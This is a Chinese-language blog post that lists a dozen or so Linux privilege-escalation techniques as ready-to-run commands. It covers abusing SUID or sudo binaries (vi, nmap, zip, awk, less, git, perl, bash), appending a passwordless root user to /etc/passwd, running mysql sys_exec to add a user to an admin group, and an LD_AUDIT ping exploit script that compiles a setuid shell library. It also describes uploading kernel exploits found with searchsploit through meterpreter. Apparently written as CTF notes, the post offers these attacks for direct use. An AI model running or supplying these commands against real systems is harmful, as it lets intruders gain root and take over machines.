不会真有人用这么多提权方法都不能提权吧

teehee提权

将john写入root用户组里

echo "john::0:0:::/bin/bash" | sudo teehee -a /etc/passwd

mysql数据库提权

要被分配root权限 ,查看命令find / -perm -u=s -type f 2>/dev/null

select sys_exec("usermod -aG admin 用户ID");
原理admin用户组具备root权限,通过mysql数据库将当前用户加入至具有root权限的用户组

vi提权

要被分配root权限 ,查看命令find / -perm -u=s -type f 2>/dev/null

vi
然后进入esc就是退出时要输入wq1那里
:/bin/bash
vi命令需要具有root权限

nmap提权

要被分配root权限 ,查看命令find / -perm -u=s -type f 2>/dev/null

版本5.0一下
*进入nmap交互模式 *

nmap --interactive

!sh提权即可

zip提权

要被分配root权限 ,查看命令find / -perm -u=s -type f 2>/dev/null
核心sudo没有该命令失效

 touch exploit
 sudo -u root zip exploit.zip exploit -T -unzip-command="sh -c /bin/bash"

脚本ping提权

核心pinggcc没有则无法实现

vi 2.sh

unset LD_AUDIT
rm -r -f /tmp/exploit
mkdir /tmp/exploit
ln /bin/ping /tmp/exploit/target
exec 3< /tmp/exploit/target
ls -l /proc/$$/fd/3
rm -rf /tmp/exploit
ls -l /proc/$$/fd/3
cat > program.c << _EOF
void __attribute__((constructor)) init()
{
    setuid(0);
    system("/bin/bash");
}
_EOF
gcc -w -fPIC -shared -o /tmp/exploit program.c
LD_AUDIT="\$ORIGIN" exec /proc/self/fd/3
unset LD_AUDIT

chmod 777 2.sh
./2.sh

bash提权

要被分配root权限 ,查看命令find / -perm -u=s -type f 2>/dev/null

bash -p

awk提权

要被分配root权限 ,查看命令find / -perm -u=s -type f 2>/dev/null

awk 'BEGIN {system("/bin/sh")}'

sudo提权

因为可能有设定不需要密码就可以执行sudo的操作(来源:敲代码的时候怕麻烦设置的TVT懂得都懂)

sudo perl -e "exec '/bin/sh' "
bash -i

less提权

要被分配root权限 ,查看命令find / -perm -u=s -type f 2>/dev/null

less /etc/passwd
!/bin/sh

寻找高权限用户提权

拿到shell后进入开始寻找

cat /etc/passwd   (查看是否存在高权限用户)
cd /home (进入高级用户目录查看文件)
(进入其他用户目录,查看文件寻找密码,一般来说都可以通过历史History,wordpass)
然后登录sudo 用户名

screen提权

步骤和其他服务(exim4,apache,linux内核…)查询一样的都是searchsploit加服务然后上传运行

searchsploit screen 版本号


cat *.sh
一般来说这些sh文件都要拆分出来用,会吧会拆分吧{}

mysql数据库提权2

(漏洞来源:新建用户时喜欢把一些用户提权至root权限然后还把密码设置和root用户一样的,导致可以通过mysql查看用户密码并且拿去提权)
进入数据库

use deneme;
show tables;
select * from user;  (查看用户信息即密码,并尝试通过其密码进行登录root。)
(:不同版本命令不一样如果有加密的拿去解密,别和我说你不会解密QAQ)

shell提权

通过查看操作系统内核版本找到对应的C文件(算了当你们不会)

searchsploit Linux Kernel ?.?.?
gcc ?.c -o shell

应该会上传文件吧(算了当你们不会)
下面这东西都知道吧,提权进入的界面

meterpteter > upload /root/shell
meterpteter > chmod 777 shell

git提权

要被分配root权限 ,查看命令find / -perm -u=s -type f 2>/dev/null

sudo git help add
sudo git help config
sudo git -p help
三选一

!/bin/bash

vi提权

要被分配root权限 ,查看命令find / -perm -u=s -type f 2>/dev/null

sudo /usr/bin/vi /tmp/jin

morpheus提权

要被分配root权限 ,查看命令find / -perm -u=s -type f 2>/dev/null

morpheus 'BEGIN {system("/bin/sh")}'
# mysql # linux # 安全
Logo
Linux

更多推荐

Linux虚拟文件系统之文件系统卸载(sys_umount())

Linux中卸载文件系统由umount系统调用实现,入口函数为sys_umount()。较于文件系统的安装较为简单,下面是具体的实现。1. /*sys_umont系统调用*/2. SYSCALL_DEFINE2(umount, char __user *, name, int, flags)3. {4.struct path path;

avatar Linux

网卡速率和双工模式的配置

http://linux.chinaitlab.com/system/792187.html1、mii-tool 配置网络设备协商方式的工具;    1.1 mii-tool 介绍;    mii-tool - view, manipulate media-independent interface status (mii-tool 是查看,管理介质的网络接口的状态)

avatar Linux

Linux系统下超级终端Minicom的使用方法(例如:连接交换机,路由器等)转http://baike.baidu.com/view/2911642.htm?fr=ala0_1

<br />  Linux系统下超级终端Minicom的使用方法 <br />  Linux下的Minicom的功能与下的超级终端功能相似,适于在通过超级终端对设备的管理以及对嵌入操作系统的升级,现写出Minicom的使用手册: <br />  1. 启动minicom <br />  以root权限登录系统 <br />  使用命令 <br />  minicom –s 则minicom启动,屏

avatar Linux